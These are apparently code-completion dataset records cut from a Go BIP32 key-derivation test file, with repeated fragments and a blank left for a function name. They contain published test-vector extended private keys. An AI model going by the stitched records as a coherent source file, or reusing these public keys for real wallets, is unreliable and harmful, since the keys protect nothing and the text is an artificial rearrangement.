// xpub6DxSCdWu6jKqr4isjo7bsPeDD6s3J4YVQV1JSHZg12Eagdqnf7XX4fxqyW2sLhUoFWutL7tAELU2LiGZrEXtjVbvYptvTX5Eoa4Mamdjm9u
extendedMasterPublic, err := B58Deserialize(
"xpub6DxSCdWu6jKqr4isjo7bsPeDD6s3J4YVQV1JSHZg12Eagdqnf7XX4fxqyW2sLhUoFWutL7tAELU2LiGZrEXtjVbvYptvTX5Eoa4Mamdjm9u",
DefaultBip32Version)
assert.NoError(t, err)
expectedChildren := []testChildKey{
{pathFragment: 0, hexPubKey: "0243187e1a2ba9ba824f5f81090650c8f4faa82b7baf93060d10b81f4b705afd46"},
{pathFragment: 1, hexPubKey: "023790d11eb715c4320d8e31fba3a09b700051dc2cdbcce03f44b11c274d1e220b"},
{pathFragment: 2, hexPubKey: "0302c5749c3c75cea234878ae3f4d8f65b75d584bcd7ed0943b016d6f6b59a2bad"},
{pathFragment: 3, hexPubKey: "03f0440c94e5b14ea5b15875934597afff541bec287c6e65dc1102cafc07f69699"},
{pathFragment: 4, hexPubKey: "026419d0d8996707605508ac44c5871edc7fe206a79ef615b74f2eea09c5852e2b"},
{pathFragment: 5, hexPubKey: "02f63c6f195eea98bdb163c4a094260dea71d264b21234bed4df3899236e6c2298"},
{pathFragment: 6, hexPubKey: "02d74709cd522081064858f393d009ead5a0ecd43ede3a1f57befcc942025cb5f9"},
{pathFragment: 7, hexPubKey: "03e54bb92630c943d38bbd8a4a2e65fca7605e672d30a0e545a7198cbb60729ceb"},
{pathFragment: 8, hexPubKey: "027e9d5acd14d39c4938697fba388cd2e8f31fc1c5dc02fafb93a10a280de85199"},
{pathFragment: 9, hexPubKey: "02a167a9f0d57468fb6abf2f3f7967e2cadf574314753a06a9ef29bc76c54638d2"},
{pathFragment: 100, hexPubKey: "020db9ba00ddf68428e3f5bfe54252bbcd75b21e42f51bf3bfc4172bf0e5fa7905"},
{pathFragment: 101, hexPubKey: "0299e3790956570737d6164e6fcda5a3daa304065ca95ba46bc73d436b84f34d46"},
{pathFragment: 102, hexPubKey: "0202e0732c4c5d2b1036af173640e01957998cfd4f9cdaefab6ffe76eb869e2c59"},
{pathFragment: 103, hexPubKey: "03d050adbd996c0c5d737ff638402dfbb8c08e451fef10e6d62fb57887c1ac6cb2"},
{pathFragment: 104, hexPubKey: "038d466399e2d68b4b16043ad4d88893b3b2f84fc443368729a973df1e66f4f530"},
{pathFragment: 105, hexPubKey: "034811e2f0c8c50440c08c2c9799b99c911c036e877e8325386ff61723ae3ffdce"},
{pathFragment: 106, hexPubKey: "026339fd5842921888e711a6ba9104a5f0c94cc0569855273cf5faefdfbcd3cc29"},
{pathFragment: 107, hexPubKey: "02833705c1069fab2aa92c6b0dac27807290d72e9f52378d493ac44849ca003b22"},
{pathFragment: 108, hexPubKey: "032d2639bde1eb7bdf8444bd4f6cc26a9d1bdecd8ea15fac3b992c3da68d9d1df5"},
{pathFragment: 109, hexPubKey: "02479c6d4a64b93a2f4343aa862c938fbc658c99219dd7bebb4830307cbd76c9e9"},
}
for _, child := range expectedChildren {
pubKey, err := extendedMasterPublic.NewChildKey(child.pathFragment)
assert.NoError(t, err)
assert.False(t, pubKey.IsPrivate)
assert.Equal(t, child.hexPubKey, hex.EncodeToString(pubKey.Key))
}
}
func TestNewSeed(t *testing.T) {
for i := 0; i < 20; i++ {
seed, err := NewSeed()
assert.NoError(t, err)
assert.Equal(t, 256, len(seed))
}
}
func | (t *testing.T) {
tests := []struct {
seed []byte
base58 string
}{
{[]byte{}, "xprv9s21ZrQH143K4YUcKrp6cVxQaX59ZFkN6MFdeZjt8CHVYNs55xxQSvZpHWfojWMv6zgjmzopCyWPSFAnV4RU33J4pwCcnhsB4R4mPEnTsMC"},
{[]byte{1}, "xprv9s21ZrQH143K3YSbAXLMPCzJso5QAarQksAGc5rQCyZCBfw4Rj2PqVLFNgezSBhktYkiL3Ta2stLPDF9yZtLMaxk6Spiqh3DNFG8p8MVeEC"},
{[]byte{1, 2, 3, 4, 5, 6, 7, 8, 9, 0}, "xprv9s21ZrQH143K2hKT3jMKPFEcQLbx2XD55NtqQA7B4C5U9mTZY7gBeCdoFgurN4pxkQshzP8AQhBmUNgAo5djj5FzvUFh5pKH6wcRMSXVuc1"},
}
for _, test := range tests {
key, err := NewMasterKey(test.seed)
assert.NoError(t, err)
assertKeySerialization(t, key, test.base58)
}
}
func TestDeserializingInvalidStrings(t *testing.T) {
tests := []struct {
err error
base58 string
}{
{ErrSerializedKeyWrongSize, "xprv9s21ZrQH143K4YUcKrp6cVxQaX59ZFkN6MFdeZjt8CHVYNs55xxQSvZpHWfojWMv6zgjmzopCyWPSFAnV4RU33J4pwCcnhsB4R4mPEnTsM"},
{ErrInvalidChecksum, "xprv9s21ZrQH143K3YSbAXLMPCzJso5QAarQksAGc5rQCyZCBfw4Rj2PqVLFNgezSBhktYkiL3Ta2stLPDF9yZtLMaxk6Spiqh3DNFG8p8MVeEc"},
}
for _, test := range tests {
_, err := B58Deserialize(test.base58, DefaultBip32Version)
assert.Equal(t, test.err, err)
}
_, err := B58Deserialize("notbase58iiiiiIIIIIbAXLMPCzJso5QAarQksAGc5rQCyZCBfw4Rj2PqVLFNgezSBhktYkiL3Ta2stLPDF9yZtLMaxk6Spiqh3DNFG8p8MVeEc",
DefaultBip32Version)
assert.NotNil(t, err)
}
func TestCantCreateHardenedPublicChild(t *testing.T) {
key, err := NewMasterKey([]byte{})
assert.NoError(t, err)
// Test that it works for private keys
_, err = key.NewChildKey(FirstHardenedChild - 1)
assert.NoError(t, err)
_, err = key.NewChildKey(FirstHardenedChild)
assert.NoError(t, err)
_, err = key.NewChildKey(FirstHardenedChild + 1)
assert.NoError(t, err)
// Test that it throws an error for public keys if hardened
key = key.PublicKey()
_, err = key.NewChildKey(FirstHardenedChild - 1)
assert.NoError(t, err)
_, err = key.NewChildKey(FirstHardenedChild)
assert.Equal(t, ErrHardnedChildPublicKey, err)
_, err = key.NewChildKey(FirstHardenedChild + 1)
assert.Equal(t, ErrHardnedChildPublicKey, err)
}
func assertKeySerialization(t *testing.T, key *Key, knownBase58 string) {
serializedBase58 := key.B58Serialize()
assert.Equal(t, knownBase58, serializedBase58)
unserializedBase58, err := B58Deserialize(serializedBase58, DefaultBip32Version)
assert.NoError(t, err)
assert.Equal(t, key, unserializedBase58)
}
| TestB58SerializeUnserialize | identifier_name |
bip32_test.go | package bip32
import (
"encoding/hex"
"testing"
"github.com/stretchr/testify/assert"
)
type testMasterKey struct {
seed string
children []testChildKey
privKey string
pubKey string
}
type testChildKey struct {
pathFragment uint32
privKey string
pubKey string
hexPubKey string
}
func TestBip32TestVectors(t *testing.T) |
func testVectorKeyPairs(t *testing.T, vector testMasterKey) {
// Decode master seed into hex
seed, _ := hex.DecodeString(vector.seed)
// Generate a master private and public key
privKey, err := NewMasterKey(seed)
assert.NoError(t, err)
pubKey := privKey.PublicKey()
assert.Equal(t, vector.privKey, privKey.String())
assert.Equal(t, vector.pubKey, pubKey.String())
// Iterate over the entire child chain and test the given keys
for _, testChildKey := range vector.children {
// Get the private key at the given key tree path
privKey, err = privKey.NewChildKey(testChildKey.pathFragment)
assert.NoError(t, err)
// Get this private key's public key
pubKey = privKey.PublicKey()
// Assert correctness
assert.Equal(t, testChildKey.privKey, privKey.String())
assert.Equal(t, testChildKey.pubKey, pubKey.String())
// Serialize and deserialize both keys and ensure they're the same
assertKeySerialization(t, privKey, testChildKey.privKey)
assertKeySerialization(t, pubKey, testChildKey.pubKey)
}
}
func TestPublicParentPublicChildDerivation(t *testing.T) {
// Generated using https://iancoleman.github.io/bip39/
// Root key:
// xprv9s21ZrQH143K2Cfj4mDZBcEecBmJmawReGwwoAou2zZzG45bM6cFPJSvobVTCB55L6Ld2y8RzC61CpvadeAnhws3CHsMFhNjozBKGNgucYm
// Derivation Path m/44'/60'/0'/0:
// xprv9zy5o7z1GMmYdaeQdmabWFhUf52Ytbpe3G5hduA4SghboqWe7aDGWseN8BJy1GU72wPjkCbBE1hvbXYqpCecAYdaivxjNnBoSNxwYD4wHpW
// xpub6DxSCdWu6jKqr4isjo7bsPeDD6s3J4YVQV1JSHZg12Eagdqnf7XX4fxqyW2sLhUoFWutL7tAELU2LiGZrEXtjVbvYptvTX5Eoa4Mamdjm9u
extendedMasterPublic, err := B58Deserialize(
"xpub6DxSCdWu6jKqr4isjo7bsPeDD6s3J4YVQV1JSHZg12Eagdqnf7XX4fxqyW2sLhUoFWutL7tAELU2LiGZrEXtjVbvYptvTX5Eoa4Mamdjm9u",
DefaultBip32Version)
assert.NoError(t, err)
expectedChildren := []testChildKey{
{pathFragment: 0, hexPubKey: "0243187e1a2ba9ba824f5f81090650c8f4faa82b7baf93060d10b81f4b705afd46"},
{pathFragment: 1, hexPubKey: "023790d11eb715c4320d8e31fba3a09b700051dc2cdbcce03f44b11c274d1e220b"},
{pathFragment: 2, hexPubKey: "0302c5749c3c75cea234878ae3f4d8f65b75d584bcd7ed0943b016d6f6b59a2bad"},
{pathFragment: 3, hexPubKey: "03f0440c94e5b14ea5b15875934597afff541bec287c6e65dc1102cafc07f69699"},
{pathFragment: 4, hexPubKey: "026419d0d8996707605508ac44c5871edc7fe206a79ef615b74f2eea09c5852e2b"},
{pathFragment: 5, hexPubKey: "02f63c6f195eea98bdb163c4a094260dea71d264b21234bed4df3899236e6c2298"},
{pathFragment: 6, hexPubKey: "02d74709cd522081064858f393d009ead5a0ecd43ede3a1f57befcc942025cb5f9"},
{pathFragment: 7, hexPubKey: "03e54bb92630c943d38bbd8a4a2e65fca7605e672d30a0e545a7198cbb60729ceb"},
{pathFragment: 8, hexPubKey: "027e9d5acd14d39c4938697fba388cd2e8f31fc1c5dc02fafb93a10a280de85199"},
{pathFragment: 9, hexPubKey: "02a167a9f0d57468fb6abf2f3f7967e2cadf574314753a06a9ef29bc76c54638d2"},
{pathFragment: 100, hexPubKey: "020db9ba00ddf68428e3f5bfe54252bbcd75b21e42f51bf3bfc4172bf0e5fa7905"},
{pathFragment: 101, hexPubKey: "0299e3790956570737d6164e6fcda5a3daa304065ca95ba46bc73d436b84f34d46"},
{pathFragment: 102, hexPubKey: "0202e0732c4c5d2b1036af173640e01957998cfd4f9cdaefab6ffe76eb869e2c59"},
{pathFragment: 103, hexPubKey: "03d050adbd996c0c5d737ff638402dfbb8c08e451fef10e6d62fb57887c1ac6cb2"},
{pathFragment: 104, hexPubKey: "038d466399e2d68b4b16043ad4d88893b3b2f84fc443368729a973df1e66f4f530"},
{pathFragment: 105, hexPubKey: "034811e2f0c8c50440c08c2c9799b99c911c036e877e8325386ff61723ae3ffdce"},
{pathFragment: 106, hexPubKey: "026339fd5842921888e711a6ba9104a5f0c94cc0569855273cf5faefdfbcd3cc29"},
{pathFragment: 107, hexPubKey: "02833705c1069fab2aa92c6b0dac27807290d72e9f52378d493ac44849ca003b22"},
{pathFragment: 108, hexPubKey: "032d2639bde1eb7bdf8444bd4f6cc26a9d1bdecd8ea15fac3b992c3da68d9d1df5"},
{pathFragment: 109, hexPubKey: "02479c6d4a64b93a2f4343aa862c938fbc658c99219dd7bebb4830307cbd76c9e9"},
}
for _, child := range expectedChildren {
pubKey, err := extendedMasterPublic.NewChildKey(child.pathFragment)
assert.NoError(t, err)
assert.False(t, pubKey.IsPrivate)
assert.Equal(t, child.hexPubKey, hex.EncodeToString(pubKey.Key))
}
}
func TestNewSeed(t *testing.T) {
for i := 0; i < 20; i++ {
seed, err := NewSeed()
assert.NoError(t, err)
assert.Equal(t, 256, len(seed))
}
}
func TestB58SerializeUnserialize(t *testing.T) {
tests := []struct {
seed []byte
base58 string
}{
{[]byte{}, "xprv9s21ZrQH143K4YUcKrp6cVxQaX59ZFkN6MFdeZjt8CHVYNs55xxQSvZpHWfojWMv6zgjmzopCyWPSFAnV4RU33J4pwCcnhsB4R4mPEnTsMC"},
{[]byte{1}, "xprv9s21ZrQH143K3YSbAXLMPCzJso5QAarQksAGc5rQCyZCBfw4Rj2PqVLFNgezSBhktYkiL3Ta2stLPDF9yZtLMaxk6Spiqh3DNFG8p8MVeEC"},
{[]byte{1, 2, 3, 4, 5, 6, 7, 8, 9, 0}, "xprv9s21ZrQH143K2hKT3jMKPFEcQLbx2XD55NtqQA7B4C5U9mTZY7gBeCdoFgurN4pxkQshzP8AQhBmUNgAo5djj5FzvUFh5pKH6wcRMSXVuc1"},
}
for _, test := range tests {
key, err := NewMasterKey(test.seed)
assert.NoError(t, err)
assertKeySerialization(t, key, test.base58)
}
}
func TestDeserializingInvalidStrings(t *testing.T) {
tests := []struct {
err error
base58 string
}{
{ErrSerializedKeyWrongSize, "xprv9s21ZrQH143K4YUcKrp6cVxQaX59ZFkN6MFdeZjt8CHVYNs55xxQSvZpHWfojWMv6zgjmzopCyWPSFAnV4RU33J4pwCcnhsB4R4mPEnTsM"},
{ErrInvalidChecksum, "xprv9s21ZrQH143K3YSbAXLMPCzJso5QAarQksAGc5rQCyZCBfw4Rj2PqVLFNgezSBhktYkiL3Ta2stLPDF9yZtLMaxk6Spiqh3DNFG8p8MVeEc"},
}
for _, test := range tests {
_, err := B58Deserialize(test.base58, DefaultBip32Version)
assert.Equal(t, test.err, err)
}
_, err := B58Deserialize("notbase58iiiiiIIIIIbAXLMPCzJso5QAarQksAGc5rQCyZCBfw4Rj2PqVLFNgezSBhktYkiL3Ta2stLPDF9yZtLMaxk6Spiqh3DNFG8p8MVeEc",
DefaultBip32Version)
assert.NotNil(t, err)
}
func TestCantCreateHardenedPublicChild(t *testing.T) {
key, err := NewMasterKey([]byte{})
assert.NoError(t, err)
// Test that it works for private keys
_, err = key.NewChildKey(FirstHardenedChild - 1)
assert.NoError(t, err)
_, err = key.NewChildKey(FirstHardenedChild)
assert.NoError(t, err)
_, err = key.NewChildKey(FirstHardenedChild + 1)
assert.NoError(t, err)
// Test that it throws an error for public keys if hardened
key = key.PublicKey()
_, err = key.NewChildKey(FirstHardenedChild - 1)
assert.NoError(t, err)
_, err = key.NewChildKey(FirstHardenedChild)
assert.Equal(t, ErrHardnedChildPublicKey, err)
_, err = key.NewChildKey(FirstHardenedChild + 1)
assert.Equal(t, ErrHardnedChildPublicKey, err)
}
func assertKeySerialization(t *testing.T, key *Key, knownBase58 string) {
serializedBase58 := key.B58Serialize()
assert.Equal(t, knownBase58, serializedBase58)
unserializedBase58, err := B58Deserialize(serializedBase58, DefaultBip32Version)
assert.NoError(t, err)
assert.Equal(t, key, unserializedBase58)
}
| {
hStart := FirstHardenedChild
vector1 := testMasterKey{
seed: "000102030405060708090a0b0c0d0e0f",
privKey: "xprv9s21ZrQH143K3QTDL4LXw2F7HEK3wJUD2nW2nRk4stbPy6cq3jPPqjiChkVvvNKmPGJxWUtg6LnF5kejMRNNU3TGtRBeJgk33yuGBxrMPHi",
pubKey: "xpub661MyMwAqRbcFtXgS5sYJABqqG9YLmC4Q1Rdap9gSE8NqtwybGhePY2gZ29ESFjqJoCu1Rupje8YtGqsefD265TMg7usUDFdp6W1EGMcet8",
children: []testChildKey{
{
pathFragment: hStart,
privKey: "xprv9uHRZZhk6KAJC1avXpDAp4MDc3sQKNxDiPvvkX8Br5ngLNv1TxvUxt4cV1rGL5hj6KCesnDYUhd7oWgT11eZG7XnxHrnYeSvkzY7d2bhkJ7",
pubKey: "xpub68Gmy5EdvgibQVfPdqkBBCHxA5htiqg55crXYuXoQRKfDBFA1WEjWgP6LHhwBZeNK1VTsfTFUHCdrfp1bgwQ9xv5ski8PX9rL2dZXvgGDnw",
},
{
pathFragment: 1,
privKey: "xprv9wTYmMFdV23N2TdNG573QoEsfRrWKQgWeibmLntzniatZvR9BmLnvSxqu53Kw1UmYPxLgboyZQaXwTCg8MSY3H2EU4pWcQDnRnrVA1xe8fs",
pubKey: "xpub6ASuArnXKPbfEwhqN6e3mwBcDTgzisQN1wXN9BJcM47sSikHjJf3UFHKkNAWbWMiGj7Wf5uMash7SyYq527Hqck2AxYysAA7xmALppuCkwQ",
},
{
pathFragment: 2 + hStart,
privKey: "xprv9z4pot5VBttmtdRTWfWQmoH1taj2axGVzFqSb8C9xaxKymcFzXBDptWmT7FwuEzG3ryjH4ktypQSAewRiNMjANTtpgP4mLTj34bhnZX7UiM",
pubKey: "xpub6D4BDPcP2GT577Vvch3R8wDkScZWzQzMMUm3PWbmWvVJrZwQY4VUNgqFJPMM3No2dFDFGTsxxpG5uJh7n7epu4trkrX7x7DogT5Uv6fcLW5",
},
{
pathFragment: 2,
privKey: "xprvA2JDeKCSNNZky6uBCviVfJSKyQ1mDYahRjijr5idH2WwLsEd4Hsb2Tyh8RfQMuPh7f7RtyzTtdrbdqqsunu5Mm3wDvUAKRHSC34sJ7in334",
pubKey: "xpub6FHa3pjLCk84BayeJxFW2SP4XRrFd1JYnxeLeU8EqN3vDfZmbqBqaGJAyiLjTAwm6ZLRQUMv1ZACTj37sR62cfN7fe5JnJ7dh8zL4fiyLHV",
},
{
pathFragment: 1000000000,
privKey: "xprvA41z7zogVVwxVSgdKUHDy1SKmdb533PjDz7J6N6mV6uS3ze1ai8FHa8kmHScGpWmj4WggLyQjgPie1rFSruoUihUZREPSL39UNdE3BBDu76",
pubKey: "xpub6H1LXWLaKsWFhvm6RVpEL9P4KfRZSW7abD2ttkWP3SSQvnyA8FSVqNTEcYFgJS2UaFcxupHiYkro49S8yGasTvXEYBVPamhGW6cFJodrTHy",
},
},
}
vector2 := testMasterKey{
seed: "fffcf9f6f3f0edeae7e4e1dedbd8d5d2cfccc9c6c3c0bdbab7b4b1aeaba8a5a29f9c999693908d8a8784817e7b7875726f6c696663605d5a5754514e4b484542",
privKey: "xprv9s21ZrQH143K31xYSDQpPDxsXRTUcvj2iNHm5NUtrGiGG5e2DtALGdso3pGz6ssrdK4PFmM8NSpSBHNqPqm55Qn3LqFtT2emdEXVYsCzC2U",
pubKey: "xpub661MyMwAqRbcFW31YEwpkMuc5THy2PSt5bDMsktWQcFF8syAmRUapSCGu8ED9W6oDMSgv6Zz8idoc4a6mr8BDzTJY47LJhkJ8UB7WEGuduB",
children: []testChildKey{
{
pathFragment: 0,
privKey: "xprv9vHkqa6EV4sPZHYqZznhT2NPtPCjKuDKGY38FBWLvgaDx45zo9WQRUT3dKYnjwih2yJD9mkrocEZXo1ex8G81dwSM1fwqWpWkeS3v86pgKt",
pubKey: "xpub69H7F5d8KSRgmmdJg2KhpAK8SR3DjMwAdkxj3ZuxV27CprR9LgpeyGmXUbC6wb7ERfvrnKZjXoUmmDznezpbZb7ap6r1D3tgFxHmwMkQTPH",
},
{
pathFragment: 2147483647 + hStart,
privKey: "xprv9wSp6B7kry3Vj9m1zSnLvN3xH8RdsPP1Mh7fAaR7aRLcQMKTR2vidYEeEg2mUCTAwCd6vnxVrcjfy2kRgVsFawNzmjuHc2YmYRmagcEPdU9",
pubKey: "xpub6ASAVgeehLbnwdqV6UKMHVzgqAG8Gr6riv3Fxxpj8ksbH9ebxaEyBLZ85ySDhKiLDBrQSARLq1uNRts8RuJiHjaDMBU4Zn9h8LZNnBC5y4a",
},
{
pathFragment: 1,
privKey: "xprv9zFnWC6h2cLgpmSA46vutJzBcfJ8yaJGg8cX1e5StJh45BBciYTRXSd25UEPVuesF9yog62tGAQtHjXajPPdbRCHuWS6T8XA2ECKADdw4Ef",
pubKey: "xpub6DF8uhdarytz3FWdA8TvFSvvAh8dP3283MY7p2V4SeE2wyWmG5mg5EwVvmdMVCQcoNJxGoWaU9DCWh89LojfZ537wTfunKau47EL2dhHKon",
},
{
pathFragment: 2147483646 + hStart,
privKey: "xprvA1RpRA33e1JQ7ifknakTFpgNXPmW2YvmhqLQYMmrj4xJXXWYpDPS3xz7iAxn8L39njGVyuoseXzU6rcxFLJ8HFsTjSyQbLYnMpCqE2VbFWc",
pubKey: "xpub6ERApfZwUNrhLCkDtcHTcxd75RbzS1ed54G1LkBUHQVHQKqhMkhgbmJbZRkrgZw4koxb5JaHWkY4ALHY2grBGRjaDMzQLcgJvLJuZZvRcEL",
},
{
pathFragment: 2,
privKey: "xprvA2nrNbFZABcdryreWet9Ea4LvTJcGsqrMzxHx98MMrotbir7yrKCEXw7nadnHM8Dq38EGfSh6dqA9QWTyefMLEcBYJUuekgW4BYPJcr9E7j",
pubKey: "xpub6FnCn6nSzZAw5Tw7cgR9bi15UV96gLZhjDstkXXxvCLsUXBGXPdSnLFbdpq8p9HmGsApME5hQTZ3emM2rnY5agb9rXpVGyy3bdW6EEgAtqt",
},
},
}
vector3 := testMasterKey{
seed: "4b381541583be4423346c643850da4b320e46a87ae3d2a4e6da11eba819cd4acba45d239319ac14f863b8d5ab5a0d0c64d2e8a1e7d1457df2e5a3c51c73235be",
privKey: "xprv9s21ZrQH143K25QhxbucbDDuQ4naNntJRi4KUfWT7xo4EKsHt2QJDu7KXp1A3u7Bi1j8ph3EGsZ9Xvz9dGuVrtHHs7pXeTzjuxBrCmmhgC6",
pubKey: "xpub661MyMwAqRbcEZVB4dScxMAdx6d4nFc9nvyvH3v4gJL378CSRZiYmhRoP7mBy6gSPSCYk6SzXPTf3ND1cZAceL7SfJ1Z3GC8vBgp2epUt13",
children: []testChildKey{
{
pathFragment: hStart + 0,
privKey: "xprv9uPDJpEQgRQfDcW7BkF7eTya6RPxXeJCqCJGHuCJ4GiRVLzkTXBAJMu2qaMWPrS7AANYqdq6vcBcBUdJCVVFceUvJFjaPdGZ2y9WACViL4L",
pubKey: "xpub68NZiKmJWnxxS6aaHmn81bvJeTESw724CRDs6HbuccFQN9Ku14VQrADWgqbhhTHBaohPX4CjNLf9fq9MYo6oDaPPLPxSb7gwQN3ih19Zm4Y",
},
},
}
testVectorKeyPairs(t, vector1)
testVectorKeyPairs(t, vector2)
testVectorKeyPairs(t, vector3)
} | identifier_body |
bip32_test.go | package bip32
import (
"encoding/hex"
"testing"
"github.com/stretchr/testify/assert"
)
type testMasterKey struct {
seed string
children []testChildKey
privKey string
pubKey string
}
type testChildKey struct {
pathFragment uint32
privKey string
pubKey string
hexPubKey string
}
func TestBip32TestVectors(t *testing.T) {
hStart := FirstHardenedChild
vector1 := testMasterKey{
seed: "000102030405060708090a0b0c0d0e0f",
privKey: "xprv9s21ZrQH143K3QTDL4LXw2F7HEK3wJUD2nW2nRk4stbPy6cq3jPPqjiChkVvvNKmPGJxWUtg6LnF5kejMRNNU3TGtRBeJgk33yuGBxrMPHi",
pubKey: "xpub661MyMwAqRbcFtXgS5sYJABqqG9YLmC4Q1Rdap9gSE8NqtwybGhePY2gZ29ESFjqJoCu1Rupje8YtGqsefD265TMg7usUDFdp6W1EGMcet8",
children: []testChildKey{
{
pathFragment: hStart,
privKey: "xprv9uHRZZhk6KAJC1avXpDAp4MDc3sQKNxDiPvvkX8Br5ngLNv1TxvUxt4cV1rGL5hj6KCesnDYUhd7oWgT11eZG7XnxHrnYeSvkzY7d2bhkJ7",
pubKey: "xpub68Gmy5EdvgibQVfPdqkBBCHxA5htiqg55crXYuXoQRKfDBFA1WEjWgP6LHhwBZeNK1VTsfTFUHCdrfp1bgwQ9xv5ski8PX9rL2dZXvgGDnw",
},
{
pathFragment: 1,
privKey: "xprv9wTYmMFdV23N2TdNG573QoEsfRrWKQgWeibmLntzniatZvR9BmLnvSxqu53Kw1UmYPxLgboyZQaXwTCg8MSY3H2EU4pWcQDnRnrVA1xe8fs",
pubKey: "xpub6ASuArnXKPbfEwhqN6e3mwBcDTgzisQN1wXN9BJcM47sSikHjJf3UFHKkNAWbWMiGj7Wf5uMash7SyYq527Hqck2AxYysAA7xmALppuCkwQ",
},
{
pathFragment: 2 + hStart,
privKey: "xprv9z4pot5VBttmtdRTWfWQmoH1taj2axGVzFqSb8C9xaxKymcFzXBDptWmT7FwuEzG3ryjH4ktypQSAewRiNMjANTtpgP4mLTj34bhnZX7UiM",
pubKey: "xpub6D4BDPcP2GT577Vvch3R8wDkScZWzQzMMUm3PWbmWvVJrZwQY4VUNgqFJPMM3No2dFDFGTsxxpG5uJh7n7epu4trkrX7x7DogT5Uv6fcLW5",
},
{
pathFragment: 2,
privKey: "xprvA2JDeKCSNNZky6uBCviVfJSKyQ1mDYahRjijr5idH2WwLsEd4Hsb2Tyh8RfQMuPh7f7RtyzTtdrbdqqsunu5Mm3wDvUAKRHSC34sJ7in334",
pubKey: "xpub6FHa3pjLCk84BayeJxFW2SP4XRrFd1JYnxeLeU8EqN3vDfZmbqBqaGJAyiLjTAwm6ZLRQUMv1ZACTj37sR62cfN7fe5JnJ7dh8zL4fiyLHV",
},
{
pathFragment: 1000000000,
privKey: "xprvA41z7zogVVwxVSgdKUHDy1SKmdb533PjDz7J6N6mV6uS3ze1ai8FHa8kmHScGpWmj4WggLyQjgPie1rFSruoUihUZREPSL39UNdE3BBDu76",
pubKey: "xpub6H1LXWLaKsWFhvm6RVpEL9P4KfRZSW7abD2ttkWP3SSQvnyA8FSVqNTEcYFgJS2UaFcxupHiYkro49S8yGasTvXEYBVPamhGW6cFJodrTHy",
},
},
}
vector2 := testMasterKey{
seed: "fffcf9f6f3f0edeae7e4e1dedbd8d5d2cfccc9c6c3c0bdbab7b4b1aeaba8a5a29f9c999693908d8a8784817e7b7875726f6c696663605d5a5754514e4b484542",
privKey: "xprv9s21ZrQH143K31xYSDQpPDxsXRTUcvj2iNHm5NUtrGiGG5e2DtALGdso3pGz6ssrdK4PFmM8NSpSBHNqPqm55Qn3LqFtT2emdEXVYsCzC2U",
pubKey: "xpub661MyMwAqRbcFW31YEwpkMuc5THy2PSt5bDMsktWQcFF8syAmRUapSCGu8ED9W6oDMSgv6Zz8idoc4a6mr8BDzTJY47LJhkJ8UB7WEGuduB",
children: []testChildKey{
{
pathFragment: 0,
privKey: "xprv9vHkqa6EV4sPZHYqZznhT2NPtPCjKuDKGY38FBWLvgaDx45zo9WQRUT3dKYnjwih2yJD9mkrocEZXo1ex8G81dwSM1fwqWpWkeS3v86pgKt",
pubKey: "xpub69H7F5d8KSRgmmdJg2KhpAK8SR3DjMwAdkxj3ZuxV27CprR9LgpeyGmXUbC6wb7ERfvrnKZjXoUmmDznezpbZb7ap6r1D3tgFxHmwMkQTPH",
},
{
pathFragment: 2147483647 + hStart,
privKey: "xprv9wSp6B7kry3Vj9m1zSnLvN3xH8RdsPP1Mh7fAaR7aRLcQMKTR2vidYEeEg2mUCTAwCd6vnxVrcjfy2kRgVsFawNzmjuHc2YmYRmagcEPdU9",
pubKey: "xpub6ASAVgeehLbnwdqV6UKMHVzgqAG8Gr6riv3Fxxpj8ksbH9ebxaEyBLZ85ySDhKiLDBrQSARLq1uNRts8RuJiHjaDMBU4Zn9h8LZNnBC5y4a",
},
{
pathFragment: 1,
privKey: "xprv9zFnWC6h2cLgpmSA46vutJzBcfJ8yaJGg8cX1e5StJh45BBciYTRXSd25UEPVuesF9yog62tGAQtHjXajPPdbRCHuWS6T8XA2ECKADdw4Ef",
pubKey: "xpub6DF8uhdarytz3FWdA8TvFSvvAh8dP3283MY7p2V4SeE2wyWmG5mg5EwVvmdMVCQcoNJxGoWaU9DCWh89LojfZ537wTfunKau47EL2dhHKon",
},
{
pathFragment: 2147483646 + hStart,
privKey: "xprvA1RpRA33e1JQ7ifknakTFpgNXPmW2YvmhqLQYMmrj4xJXXWYpDPS3xz7iAxn8L39njGVyuoseXzU6rcxFLJ8HFsTjSyQbLYnMpCqE2VbFWc",
pubKey: "xpub6ERApfZwUNrhLCkDtcHTcxd75RbzS1ed54G1LkBUHQVHQKqhMkhgbmJbZRkrgZw4koxb5JaHWkY4ALHY2grBGRjaDMzQLcgJvLJuZZvRcEL",
},
{
pathFragment: 2,
privKey: "xprvA2nrNbFZABcdryreWet9Ea4LvTJcGsqrMzxHx98MMrotbir7yrKCEXw7nadnHM8Dq38EGfSh6dqA9QWTyefMLEcBYJUuekgW4BYPJcr9E7j",
pubKey: "xpub6FnCn6nSzZAw5Tw7cgR9bi15UV96gLZhjDstkXXxvCLsUXBGXPdSnLFbdpq8p9HmGsApME5hQTZ3emM2rnY5agb9rXpVGyy3bdW6EEgAtqt",
},
},
}
vector3 := testMasterKey{
seed: "4b381541583be4423346c643850da4b320e46a87ae3d2a4e6da11eba819cd4acba45d239319ac14f863b8d5ab5a0d0c64d2e8a1e7d1457df2e5a3c51c73235be",
privKey: "xprv9s21ZrQH143K25QhxbucbDDuQ4naNntJRi4KUfWT7xo4EKsHt2QJDu7KXp1A3u7Bi1j8ph3EGsZ9Xvz9dGuVrtHHs7pXeTzjuxBrCmmhgC6",
pubKey: "xpub661MyMwAqRbcEZVB4dScxMAdx6d4nFc9nvyvH3v4gJL378CSRZiYmhRoP7mBy6gSPSCYk6SzXPTf3ND1cZAceL7SfJ1Z3GC8vBgp2epUt13",
children: []testChildKey{
{
pathFragment: hStart + 0,
privKey: "xprv9uPDJpEQgRQfDcW7BkF7eTya6RPxXeJCqCJGHuCJ4GiRVLzkTXBAJMu2qaMWPrS7AANYqdq6vcBcBUdJCVVFceUvJFjaPdGZ2y9WACViL4L",
pubKey: "xpub68NZiKmJWnxxS6aaHmn81bvJeTESw724CRDs6HbuccFQN9Ku14VQrADWgqbhhTHBaohPX4CjNLf9fq9MYo6oDaPPLPxSb7gwQN3ih19Zm4Y",
},
},
}
testVectorKeyPairs(t, vector1)
testVectorKeyPairs(t, vector2)
testVectorKeyPairs(t, vector3)
}
func testVectorKeyPairs(t *testing.T, vector testMasterKey) {
// Decode master seed into hex
seed, _ := hex.DecodeString(vector.seed)
// Generate a master private and public key
privKey, err := NewMasterKey(seed)
assert.NoError(t, err)
pubKey := privKey.PublicKey()
assert.Equal(t, vector.privKey, privKey.String())
assert.Equal(t, vector.pubKey, pubKey.String())
// Iterate over the entire child chain and test the given keys
